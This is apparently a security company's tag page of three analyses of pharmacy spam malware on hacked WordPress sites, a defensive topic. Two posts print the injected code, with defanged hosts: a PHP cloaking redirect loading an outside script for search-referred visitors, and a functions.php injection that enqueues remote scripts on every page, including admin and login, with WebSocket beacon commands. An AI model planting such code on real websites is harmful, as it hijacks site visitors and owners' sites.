Tag: Pharmacy

FBCMS Pharmacy Spam Website

Whenever most people think of a website CMS, they most often think of the popular options like WordPress, Joomla, or Drupal. What do all three of those CMS platforms have in common along with most common CMS platforms? They use a programming language like PHP in conjunction with a database that is used to store the user-generated data. Now, in most cases that I have seen throughout the years, it is rare for a hacker to deploy one of these CMS platforms on a compromised website and use it for malicious purposes. It is usually just easier for the hacker to upload a few .zip files containing their doorway spam tools, then unzip them and move onto a new target. The content of these .zip files is usually a large directory containing a few scripts and a lot of SEO spam content that will be used to divert traffic or boost keywords. Another popular technique used by these SEO spammers is to inject existing website files and push new keywords “on-the-fly” from a remote server to the compromised websites hosting the injected files—more on that method here.

I mention this because I came across a pharmacy spam directory on a compromised website that was constructed using the Bootstrap CSS framework, along with various PHP engine files that serve the pharmacy content based on a visitor’s geolocation. Once it is loaded, it looks like a generic CMS or Bootstrap designed website except it is dedicated entirely to pharmacy spam:

Easily deployed, customisable pharmacy spam website
Easily deployed, customisable pharmacy spam website

A bizarrely named file ./wp-content/mu-plugins/0-sucuri-boot.php is used to begin loading the malicious pharmacy spam content. It contains similar header comments to our Sucuri plugin to add some fake authenticity. However, the file itself just loads the pharmacy website that was located in the directory wp-content/gforms/:
0-sucuri-boot.php: We do not use a file with such a name in our WordPress plugin
0-sucuri-boot.php: We do not use a file with such a name in our WordPress plugin

While it is unknown how the pharmacy spam website was created it looks like someone spent some time with the overall template as it has many features built into it), the configuration file is located within a ./cfg/config.victimdomain.php. This is used to define the target country (in this case, the United States) and a lot of other features related to what is going to be ultimately displayed to the visitor:

Overall, this pharmacy spam website uses over 750 files since it cannot depend upon a database to store the many pharmacy products it is advertising. It’s important to note that no actual sales occur through this pharmacy spam website that is placed onto compromised websites. Instead it redirects the visitor once they finally are ready to order:

Jul 23, 2019 by Luke Leal

Conditional redirection to an online pharmacy store

During an investigation, a client reported some weird behavior from all incoming visits during their Google search engine result clicks are instantly redirected to an online pharmacy store.

This occurred with visits that were initiated by clicking on any of their indexed search results at Google.com.

The malware caused all incoming visits from Google.com searches to be automatically redirected to hxxxs://pharm-bay(.) com.

After further investigation, the hacker simply hid the malicious code in an extensionless file called “log” in their tmp folder.

The malicious file was then loaded by ./wp-config.php as they had an include PHP function to load that log file.

Here is the conditional redirection rule snippet from the /tmp/logfile.

...if($content = $client->getContent()){if( (strpos($_SERVER['<strong>HTTP_USER_AGENT</strong>'], <strong>google</strong>)  !== false ) || (strpos($_SERVER['<strong>HTTP_USER_AGENT</strong>'], <strong>bot</strong>)  !== false ) ){echo $content;die;}elseif((strpos($_SERVER['<strong>HTTP_REFERER</strong>'], <strong>google</strong>)  !== false ) || (strpos($_SERVER['<strong>HTTP_REFERER</strong>'], <strong>bing</strong>)  !== false )){if($_SERVER[<strong>REQUEST_URI</strong>]!=<strong>/</strong>){?><<strong>script</strong> src=hxxp://<strong>scipton(.)com/doorways/default/script/script4.js</strong>></script><?php die;}}}...

As you can see, the malicious code is checking if the referrer is set to Google or Bing, and if so, it will serve the malicious JavaScript redirecting it to the hxxxs://pharm-bay(.)com pharmacy store.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Mar 28, 2019 by Moe Obaid

WebSockets, Viagra and Fake CloudFlare CDN

Recently we’ve seen some WordPress websites displaying unwanted banners at the bottom of the page which appear 15 seconds after browsing the website. Those banners are being generated due to the following code being injected into the theme’s function.php files:

function add_js_scripts() {
    wp_enqueue_script('js-rws', 'hXXp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1[.]0[.]0/reconnecting-websocket[.]js', '', null, true);
    wp_enqueue_script('js-cors', 'hXXp://cloudflare[.]solutions/ajax/libs/cors/cors[.]js', '', null, true);
}

add_action( 'wp_enqueue_scripts', 'add_js_scripts' );
add_action('admin_enqueue_scripts', 'add_js_scripts' );
add_action('login_enqueue_scripts', 'add_js_scripts' );

The code above uses WordPress core functions like wp_enqueue_script and add_action to inject external scripts into all WordPress pages (including admin and login pages).

The third-party scripts load from what looks like a CloudFlare CDN. And if you open the cloudflare[.]solutions site, you’ll see it says "This Server is part of Cloudflare Distribution Network." However, WHOIS says that the domain had been registered just on February 11, 2017 to a Russian company, Legato LLC and is now hosted in Ukraine on a server with IP 78.109.28.70.

The first injected script reconnecting-websocket.js is a copy of a legitimate ReconnectingWebSocket library. It’s not malicious. But the second injected script cors.js is more interesting. After decoding it, you may notice that it has a list of banner images saved on imgur.com image hosting.

var banners=[];
var bannercount=0;
var bannersSrc=["hXXPs://i.imgur[.]com/gXcct1z[.]jpg","hXXPs://i.imgur[.]com/FAdidSx.jpg","hXXPs://i.imgur[.]com/fGOvfDF.jpg","hXXPs://i.imgur[.]com/MjWLkNB.jpg","hXXPs://i.imgur[.]com/3On9O6O.jpg","hXXPs://i.imgur[.]com/cdBEiDU.jpg","hXXPs://i.imgur[.]com/xyKxCFG.jpg","hXXPs://i.imgur[.]com/BRSxZ96.jpg","hXXPs://i.imgur[.]com/NfyV72o.jpg","hXXPs://i.imgur[.]com/fcHTBav.jpg","hXXPs://i.imgur[.]com/5SsJqTM.jpg"];
var mobileBanners=["hXXPs://i.imgur[.]com/KRqvxk4.jpg","hXXPs://i.imgur[.]com/84mQCt4.jpg","hXXPs://i.imgur[.]com/hyblTs8[.]jpg","hXXPs://i.imgur[.]com/85tjX88.jpg"];

The script downloads the images, then waits for 15 seconds and loads them as banners that lead you to www[.]orderrealviagra[.]cc., rotating the images for every new page load. If a user clicks on the banner, or closes it (the banners have the close [x] button), the script sets the adwords-cookie-settings for the next 7 days and won’t show the banners for browsers with this cookie.

An interesting and quite rare feature of this script, is that it uses WebSocket protocol (that’s why they also inject the reconnecting-websocket.js library) instead of HTTP to communicate with its server: wss://cloudflare[.]solutions:8085 that uses a custom set of commands:

socket.send("cb*" + navigator.userAgent)
socket.send("rts*" + navigator.userAgent)
socket.send("rsbl*" + navigator.userAgent)
socket.send("msbl*" + navigator.userAgent)

Using new generic TLDs like .solutions is still quite uncommon. But not on this server. A reverse IP lookup revealed only one other site on this server (ardf[.]world) that also happen to use a new generic TLD (.world). Do these sites have the same owner or is it just a coincidence?

This case proves that malware may hide behind legit-looking URLs and you should carefully review all third-party resources that your site loads. Don’t forget that theme files are a very popular target for malware injections (the most popular for attacks that use stolen/bruteforced WordPress credentials) and you should monitor their integrity. Unauthorized changes are a strong indicator of a hack.

If you see your site showing unwanted banners or popups but can’t locate their source, you might want to have us scan your site for malware and clean it.

Apr 3, 2017 by Fernando Barbosa